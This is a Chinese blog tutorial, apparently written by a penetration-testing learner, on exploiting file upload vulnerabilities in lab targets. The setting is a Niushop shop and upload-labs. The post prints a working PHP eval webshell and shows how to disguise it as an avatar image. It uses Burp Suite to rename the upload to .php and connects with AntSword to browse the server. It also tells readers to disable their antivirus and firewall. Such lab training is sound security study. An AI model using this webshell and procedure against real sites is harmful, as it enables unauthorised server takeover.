渗透学习-第五天

今天介绍文件上传漏洞:

上传一个木马(jsp,asp,asp,php后缀的木马)  代码传入服务器,服务器当做正常代码执行,导致服务器被黑客发现。webshell(网页形式的木马,也叫网站后门,可以使asp,jsp,php等各种形式)的代码形式需要和后台一致,才能让后台服务器成功运行,<?php @eval($_POST["a"]);?>齐总,@符号表示不显示爆破信息,eval()中()内部为代码主题,eval语言构造器把接受的数据当做php语言,$_POST变量主要用于收集表单的数据,a是传递接受的参数。

现在可以实践一下,在桌面生成一个记事本,将<?php @eval($_POST['a']); ?>写在记事本内,注意大小写,空格,符号不能有中文形式。

题外话:大马,小马,图片马,不死马,绕狗马(够就是web安全防火墙):

webshell三大特征:持续远程的访问-因人而异的隐蔽性(很难被发现除非有高级安全狗)-权限提升(从入门到放弃)

入门学习:webshell免杀(自行学习)

下面详细通过实验来掩饰webshell如何入侵服务器(Niushop开源商城这个是新的网站之后也会过期,读者就不用尝试点开了,之前的网站同学用的太多崩溃了也可以用自己第一节课用的自己构建的服务器Niushop开源商城也可以):现在打开老师的云服务器购物网站(前端的用户哦,别进成后端的平台了),寻找现有的上传点,就是可以将文件上传的地方,比如你学习通交作业需要把论文word文档上传提交,你直接把这个记事本(含木马病毒)上传就可以。下面演示:

首先调整思路:哪里才能让上传文件?这里我想到了个人资料里面需要编辑自己头像的时候需要上传图片的路径可以访问服务器,但是刚才记事本是tx格式,无法上传头像,那就将文件格式改为jph格式,也就是将记事本的名字“.txt”后缀直接改成“.jph”这下,点击编辑用户头像,将头像上传,然后先别点击确定上传,这个时候打开bursuite,开始拦截抓包,此时点击上传头像,就会获得抓包信息:

你们看见我头像已经裂开了因为我事先已经木马攻击了。不过不影响演示,现在看见抓包结果,有一个filename,是1.jpg(我把记事本的名字命名的1),然后你把这里改成1.php(1)(这里不换txt而是php是因为这个网站的服务器使用的语言是php,所以木马对应php才能让服务器运行并且崩溃),然后点击放行(2)就成功了:

此时网页会开始转圈,咱们关闭拦截就会加载成功:

头像裂开,实验结束。这里用木马是为了触发文件上传漏洞。

现在需要安装一个蚁剑:安装包老师直接提供了,我直接说怎么利用安装包直接正常使用蚁剑:

按照我的路径进入这个exe软件,进去以后会出现初始化,点击初始化以后,从文件里面找到:

点击到这个文件就可以确定打开文件,就可以初始化。现在开始利用刚才传输的木马病毒进行文件上传漏洞进攻:注意,自己电脑需要关闭病毒防护拦截和防火墙:

把自己电脑对应的防火墙关闭了,并且把360,安全助手等退出,看图中,电脑不仅有病毒威胁,下面还有个防火墙一共2个防护方面,都得关闭并且最小化。注意!系统关闭病毒防护以后不要关闭这个界面,直接最小化,不然关闭以后防护会自动打开。如果你之前上传那个木马病毒的时候防火墙是开的,那就关闭,重新进行个人资料图片上传木马病毒的流程:

下来鼠标对图片右键,复制图片地址,我的这个图片(其实是php木马伪装成图片)地址是:http://127.0.0.18/upload/avator/202504111542492619.php,再打开蚁剑:

首先对着空白处右键,然后点击添加数据:

这里面,url地址粘贴,连接密码为a(<?php @eval($_POST['a']); ?>这个代码里面post的对象就是a所以连接密码为a),然后添加后(记得点击最左上角的添加哦,我忘标箭头了),再进入刚才新建的网站,右键后点击编辑网站,点击测试连接(就是上面添加,清空按钮的右边那个):

连接成功,说明成功,如果有的人是服务器空白或者链接失败,空白网页等,请检查一下原因:

1.是否彻底关闭防火墙和病毒监控(有的电脑会自动打开,需要一直最小化状态才能保持你的关闭状态)

2.你的记事本(木马病毒)内部是否有木马代码,有的时候可能内容会被系统自动删除(因为你把设置关闭后系统会自动开启病毒,防火墙防护,它们会删除掉你的记事本木马内容),需要手动打开检查,否则你个人资料上传的图片不含病毒(因为被防火墙或者病毒防护系统删除了)没啥用。

3.是否病毒网址后很久没有使用蚁剑新建网站进行保存,就是你上传以后好久没有进蚁剑,导致那个木马图片地址过期

4.如果都没有以上原因,进行一下步骤重新进行:打开电脑病毒防护,全部关闭以后,最小化,不要关闭界面,要最小化,然后,将360,等防护软件彻底关闭,可以点击ctrl+shift+esc进入运行管理手动右键关闭对应软件,然后,进入burpsuit自带浏览器进入自己的或者老师搭建的靶场,然后,检查自己的记事本是否有木马代码,然后,将记事本后缀改成.png或者.jpg,然后按之前流程继续就可以。

问题排查完以后继续操作,右键刚才添加的局域网,点击文件管理:

就会出现这个服务器的源代码,也就是第一天我们搭建购物平台靶场的所有文件都能看见,箭头所指的php就是咱们刚才与服务器进行木马攻击的记录,至此结束。

现在是补充:有的人(比如我)在访问文件的时候会出现这种问题:

有2个原因:1.网慢,2.权限不够,需要管理员权限才可以进行访问。

这里分享一下文件传输漏洞靶场网站:upload-labs

可以用burpsuite打开自己抓包练习。以下是我自己的第一关的尝试,流程和那个niushop的攻击流程一样:上传木马图片,复制图片地址,在蚁剑点开文件就好,如果你蚁剑连接失败,除了我说的那些问题以外还可能是这个北京教育网自己服务器负载过大,过一会重新尝试就好。

#小程序://CSDN/JElzj4ci0noLKem这个是这个靶场的所有题目解答。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值